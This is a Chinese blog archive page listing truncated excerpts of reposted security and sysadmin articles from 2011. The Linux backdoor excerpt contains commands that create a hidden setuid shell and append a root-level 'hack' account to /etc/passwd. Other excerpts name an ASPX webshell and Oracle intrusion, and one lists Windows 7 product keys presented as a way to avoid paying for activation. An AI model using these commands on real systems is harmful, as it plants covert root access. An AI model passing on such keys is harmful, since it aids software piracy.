收集盒 Book box

大多数文章收集自互联网

渗透测试(Penetration Testing)

Author : ZwelL 来源:www.nosec.org 零、前言 一、简介 二、制定实施方案 三、具体操作过程 四、生成报告 五、测试过程中的风险及规避 参考资料 FAQ集     零、前言 渗透测试在未得到被测试方授权之前依据某些地区法律...

2011-11-28 19:11:34

阅读数 872

评论数 0

linux 系统留后门方法+日志清除

1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh  加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/...

2011-11-28 19:09:01

阅读数 954

评论数 0

无需破解!激活正版Windows 7旗舰版 二枚"神KEY"

无需破解!激活正版Windows 7旗舰版 二枚"神KEY" 更新:补充7枚神KEY,一共9枚神KEY! KH2J9-PC326-T44D4-39H6V-TVPBY TFP9Y-VCY3P-VVH3T-8XXCC-MF4YK 236TW-X778T-8MV9F-...

2011-11-28 09:31:23

阅读数 2510

评论数 0

详述SSL和TLS的Web安全渗透测试

如果Web服务中的SSL和TLS协议出现安全问题,后果会如何?很明显,这样的话攻击者就可以拥有你所有的安全信息,包括我们的用户名、密码、信用卡、银行信息……所有的一切。本文将向读者详细介绍如何针对Web服务中的SSL和TLS协议进行安全渗透测试。我们首先对这两种协议进行了概述,然后详细介绍了针对加...

2011-11-26 20:07:44

阅读数 1702

评论数 0

SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法

今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL...

2011-11-18 16:47:53

阅读数 642

评论数 0

谈谈新手如何学习PHP

我先把我自己学习PHP的过程做一下概括:   (1)熟悉HTML/CSS/JS等网页基本元素,完成阶段可自行制作完整的网页,对元素属性达到熟悉程度   (2)理解动态语言的概念,运做机制,熟悉PHP语法   (3)学习如何将PHP与HTML结合起来完成简单动态页面   (4)接触MYSQL...

2011-11-16 11:54:25

阅读数 481

评论数 0

Fimap 应用说明

Fimap 是一款本地及远程都包含文件漏洞检测工具,并能对检测到的漏洞进行利用,带了一个google 的语法搜索功能。 参考网站:http://code.google.com/p/fimap/   ./fimap.py -h        --帮助 ./fimap.py -u 'www.g...

2011-11-14 22:25:43

阅读数 582

评论数 0

Nikto2 使用说明

名称:Nikto2 开发语言:perl 官方网站:http://www.cirt.net/ 说明:Nikto2 是一款使用perl 语言写的多平台扫描软件,是一款 命令行模式的工具,它可以扫描指定主机的web类型、主机名、特定目录、cookie、特定cgi 漏洞、xss漏洞、sq...

2011-11-14 22:24:29

阅读数 517

评论数 0

入侵oracle数据库的一些心得

信息来源: I.S.T.O 一、先看下面的一个贴子:     Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:  1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几百千兆,...

2011-11-09 15:41:02

阅读数 439

评论数 0

ASPX 1句话SHELL

ISTO的版本     ASPX One Code     " enctype="multipart/form-data"> filename:          c# if (Request.Files.Co...

2011-11-09 15:28:39

阅读数 408

评论数 0

office 2010每次打开word都要重新配置的解决方法

在“运行”中输入 reg add HKCU\Software\Microsoft\Office\14.0\Word\Options /v NoReReg /t REG_DWORD /d 1,回车。就是在 HKEY_CURRENT_USER\Software\Microsoft\Office\14....

2011-11-07 11:44:26

阅读数 534

评论数 0

Ubuntu Linux下设置IP的配置命令

1、首先确定网络连接是否正确,所用的网线是否可以正常工作 2、查看网卡是否能正常工作,检测的方法如下: a、ping 127.0.0.1 b、ping 静态网关地址 c、ping 主机名(hostname就可以看到主机名) 3、看网卡地址是否配置正确(ifconfig...

2011-11-07 01:35:50

阅读数 548

评论数 0

Asp.net夜话之一:asp.net介绍

http://blog.csdn.net/zhoufoxcn/article/details/2915811

2011-11-03 10:46:26

阅读数 305

评论数 0

MYSQL数据库导入数据时出现乱码的解决办法

我是用的最后一种方法,前面三种解决MYSQL导入数据乱码的方法没试过,东莞SEO推荐大家直接使用第四种方法处理MYSQL导入中文数据时的乱码问题。 首先在新建数据库时一定要注意生成原数据库相同的编码形式,如果已经生成可以用phpmyadmin等工具再整理一次,防止数据...

2011-11-02 09:24:48

阅读数 393

评论数 0

Web应用安全审​​计清单

下面是这有助于在Web应用安全方面为数不多的审计清单。 http://msdn.microsoft.com/en-us/library/aa302332.aspx https://blogs.sans.org/it-audit/checklists/web-application-audi...

2011-11-01 16:16:32

阅读数 334

评论数 0

nginx设置上传目录无执行权限

在windows+iis下,可以设置上传目录,类似:upload,uploadfile,attachments,这样的目录下面无脚本执行权限,从而防止非法用户上传脚本得到webshell nginx上也很简单,我们使用location。。如下: location ~ ^/upload/.*...

2011-11-01 11:12:45

阅读数 280

评论数 0

攻击方式学习系列(总) CoderZh

(原 创)攻击方式学习之(1) - 跨站式脚本(Cross-Site Scripting) (原 创)攻击方式学习之(2) - SQL注入(SQL Injection) (原 创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow) ...

2011-11-01 11:00:22

阅读数 454

评论数 0

AntiXSS - 支持Html同时防止XSS攻击

跨站脚本攻击(XSS)已经不是什么新鲜的话题了,甚至很多大公司也为此吃尽苦头。最简单直接的防范方法,就是不允许任何html标签输入,对用户输入进行编码(htmlencode)。 但是如果想用户输入支持一些格式,怎么办?一种办法就是很多论坛采用的BB Code的方法。使用特定的标签代替一些格式...

2011-11-01 10:42:24

阅读数 444

评论数 0

CentOS + Nginx 环境搭建教程

前言:本文是关于如何搭建基于“CentOS5.4 + Nginx0.8.24 + PHP5.2.11(FastCGI)+ GD + ZendOptimizer + Mysql5.1.40 + 系统优化 + 防ddos攻击”高性能、高负载Web服务器的文章,安装方式为源代码安装。  文档目...

2011-11-01 09:55:24

阅读数 374

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭